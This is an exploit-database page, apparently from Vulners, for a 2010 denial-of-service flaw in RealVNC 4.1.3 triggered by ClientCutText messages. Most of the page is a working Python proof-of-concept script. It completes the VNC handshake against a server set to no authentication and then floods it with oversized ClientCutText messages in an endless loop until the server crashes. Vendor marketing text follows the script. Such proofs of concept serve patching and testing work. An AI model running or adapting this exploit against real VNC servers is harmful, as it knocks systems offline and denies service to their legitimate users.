Lucene search
K

RealVNC 4.1.3 - ClientCutText Message Remote Denial of Service

🗓️ 02 May 2010 00:00:00Reported by John LeitchType 
exploitpack
 exploitpack
👁 8 Views

RealVNC 4.1.3 - Remote Denial of Service via ClientCutText Messag

Code
source: https://www.securityfocus.com/bid/39895/info

RealVNC Viewer is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

RealVNC 4.1.3 is vulnerable; other versions may also be affected. 

import sys, struct, socket
host ='localhost'
port = 5900

def crash_vnc_server():
    try:
        while 1:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.settimeout(1.0)       
            
            print 'Connected'

            try:
                b = s.recv(8192)
                print 'ProtocolVersion Received'
                
                s.send(b)
                print 'ProtocolVersion Sent'            
                
                b = s.recv(8192)
                print 'Security Received'

                s.send('\x01')
                print 'Security Sent'
                
                # Recv SecurityResult
                b = s.recv(8192)
                print 'SecurityResult Received'

                if (len(b) == 4 and
                    b[0] == chr(0) and
                    b[1] == chr(0) and
                    b[2] == chr(0) and
                    b[3] == chr(0)):
                    print 'SecurityResult OK'
                else:
                    print 'SecurityResult Failed.\n\nThe server must be set '\
                          'to No Authentication for this to work, otherwise '\
                          'you \'ll need to write the necessary client side '\
                          'authentication code yourself.'
                    return           

                s.send('\x01')
                print 'ClientInit Sent'
                
                b = s.recv(8192)
                print 'ServerInit Received'

                text_len = 0xFFFFFF
                text_str = struct.pack('L', text_len) + '\xAA' * text_len
                
                while 1:
                    s.send('\x06\x00\x00\x00' + text_str)

                    print 'ClientCutText Sent'
                
            except Exception:
                print 'Connection closed'                
            
    except Exception:
        print 'Couldn\'t connect'

crash_vnc_server()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 May 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
8